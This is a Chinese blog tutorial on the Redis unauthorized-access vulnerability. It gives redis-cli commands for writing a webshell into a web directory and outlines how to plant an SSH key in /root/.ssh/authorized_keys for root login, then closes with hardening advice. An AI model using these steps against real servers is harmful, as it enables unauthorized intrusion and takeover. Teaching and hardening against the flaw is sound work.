redis访问未授权漏洞

最新推荐文章于 2024-08-16 11:11:08 发布
最新推荐文章于 2024-08-16 11:11:08 发布
阅读量109 收藏
点赞数
分类专栏: 技术研究 文章标签: linux redis 数据库 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/115194285
版权

漏洞成因:

  1. 默认绑定在0.0.0.0:6379 且没有添加防火墙规则,导致暴漏在公网中
  2. 没有设置密码认证,(一般为空),可以免密码远程登录redis服务。
    漏洞危害:
  3. 无需认证,直接登录。导致敏感信息泄露
  4. 写入木马。
启动redis
redis-server /etc/redis.conf

在这里插入图片描述

利用方式:常用第一种

1)写入webshell

需要拥有读写权限
需要知道web目录,AWD中目录一样。
进入redis的src目录,执行登录命令
./redis-cli -h 目标ip
启动redis

执行以下命令进行写入webshell

config set dir /var/www/html     指定写入目录
config set dbfilename shell.php  指定shell文件名
set webshell "<?php phpinfo();?>" 指定shell内容
save或bgsave

就可以成功在/var/www/html写入shell.php文件

2)利用"公私钥"认证获取root权限

使用条件:靶机redis需要以root权限运行
攻击机生成ssh公钥和私钥,密码设为空
在这里插入图片描述

进入.ssh,将生成的公钥保存到1.txt
在这里插入图片描述

连接靶机redis服务
将存有ssh公钥的1.txt写入redis。
在这里插入图片描述

登录redis靶机,获得redis备份路径
在这里插入图片描述

更改redis备份路径为ssh公钥存放目录(默认为/root/.ssh)
在这里插入图片描述

设置上传公钥的备份文件名字为authorized_keys:
在这里插入图片描述

保存并退出
在这里插入图片描述

使用ssh免密登录

ssh -i id_rsa root@192.168.0.104

加固方式:
1) 设置密码
编辑etc/redis.conf
添加密码

requirepass 密码

2) 设置访问IP
开启ip绑定
在这里插入图片描述

最后重启redis

SwBack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
2018护网杯内存取证
SwBack的博客
09-22 242
2018护网杯内存取证
漏洞复现---Redis 远程命令执行漏洞复现
dust_hk的博客
07-10 6825
0x00 Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型...
通过dns2tcp绕过校园网认证进行免费上网
SwBack的博客
03-03 7612
通常连接校园网都需要在web页面或者客户端登陆学生账号,才可以使用。 而我们要做的,就是免费上网、
02-Redis授权访问漏洞
qq_57410330的博客
07-16 900
详谈redis授权访问漏洞,原理、利用及加固方式
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1135
Redis漏洞复现
redis授权访问漏洞
Naive的博客
05-28 1448
Redis安装后,如果绑定在,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的。
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 447
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问漏洞
周星星的博客
08-22 1373
Redis授权访问漏洞复现以及利用
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3345
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Linux 定时任务
flash的博客
08-14 357
Linux系统中,cron是一个广泛使用的定时任务工具,允许用户安排周期性执行的任务(脚本或命令)。cron守护进程(crond)会读取配置文件(通常位于/etc/crontab),并根据这些配置文件中指定的时间规则来执行相应的任务。
linux开启RNDIS,实现虚拟网卡
轩辕霸天L
08-15 421
首先要 `make clean`,清空之前的编译结果。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 491
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
linux进程
lijiaweixx的博客
08-12 609
设计程序动态生成两个进程分别向相同文件写入不同数据时,需注意父子进程操作同一文件,可通过。Linux 中的 PCB(process control block)进程的主要作用是实现并发,提高系统资源的利用率和系统的处理能力。内核的主要功能之一是完成进程调度,宏观上并行,微观上串行。创建进程,在不同的进程分支中通过。获取进程 ID 及时间来标识。
linux为QT程序创建桌面应用
王尼莫的博客
08-12 240
【代码】linux为QT程序创建桌面应用。
Linux Mqtt客户端编程
最新发布
laocui1的博客
08-16 136
Mqtt客户端
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值